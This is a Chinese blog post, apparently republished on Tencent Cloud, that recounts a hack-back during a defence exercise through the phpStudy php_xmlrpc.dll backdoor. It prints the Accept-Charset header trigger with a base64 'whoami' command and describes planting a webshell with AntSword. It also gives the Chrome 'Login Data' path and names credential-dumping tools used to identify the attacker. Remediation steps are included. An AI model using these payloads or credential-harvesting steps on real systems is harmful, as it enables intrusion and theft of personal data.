前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【实战篇】记一次蚁剑无文件连接phpstudy后门

【实战篇】记一次蚁剑无文件连接phpstudy后门

作者头像
一名白帽的成长史
发布2021-05-13 11:01:49
1.6K0
发布2021-05-13 11:01:49
举报

Hello,这里是一名白帽的成长史~今天继续来分享一下HW期间的案例。在HW期间,发现某IP频繁发起扫描攻击。

后续通过phpstudy后门进行反制,一起来看看吧~

Part.1

漏洞说明

漏洞介绍

PhpStudy是一款集安全,高效,功能与一体,支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能的国产PHP调试环境的程序集成包。

在2016以及2018年某些版本中,存在后门可直接进行RCE。

漏洞代码

后门代码存在于\ext\php_xmlrpc.dll模块中:

通过发送以下两个字段,可执行系统命令:

代码语言:javascript
复制
Accept-Encoding:gzip,deflate
Accept-Charset:base64加密后的命令

例如执行whoami命令:

执行成功:

代码语言:javascript
复制
ZWNobyBzeXN0ZW0oIndob2FtaSIpOw==

影响范围

Phpstudy+2016版+php-5.4

Phpstudy+2018版+php-5.2.17

Phpstudy+2018版+php-5.4.45

Part.2

漏洞利用

信息收集

通过威胁情报查询攻击IP,并无域名绑定信息:

攻击IP开启80,3389等服务:

尝试直接访问80端口,为初始页面:

存在phpmyadmin服务:

存在phpinfo页面,且版本为5.4.45:

判断目标服务器使用phpstudy进行搭建。

漏洞利用

尝试执行系统命令,发现存在后门:

将一句话木马进行base64加密:

使用蚁剑进行连接,密码为上面的123:

添加请求头字段,发送一句话木马:

连接成功:

溯源分析

翻找本地文件,可以找到大量作案工具:

以及定点进行的信息收集:

//基本确定为红队机器

找到chrome浏览器数据,获取攻击者信息:

代码语言:javascript
复制
C:/Users/Administrator/AppData/Local/Google/Chrome/UserData/Default/Login Data

也可以通过以下两款工具直接读取:

代码语言:javascript
复制
https://github.com/AlessandroZ/LaZagne
https://github.com/djhohnstein/sharpweb

//获取京东(手机号)以及微步用户名信息。

修复方法:

1、可以从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll:

代码语言:javascript
复制
https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip
https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

2、目前phpstudy官网上的版本不存在后门,可在phpsudy官网下载安装包进行更新。

Part.3

结语

好啦,以上就是今天的全部内容了~

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-05-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 一名白帽的成长史 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
高级威胁追溯系统
腾讯高级威胁追溯系统(Advanced Threat Tracking System,ATTS)由腾讯安全团队构建的高级威胁追溯平台,旨在帮助用户通过该平台进行线索研判,攻击定性和关联分析,追溯威胁源头,有效预测威胁的发生并及时预警。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档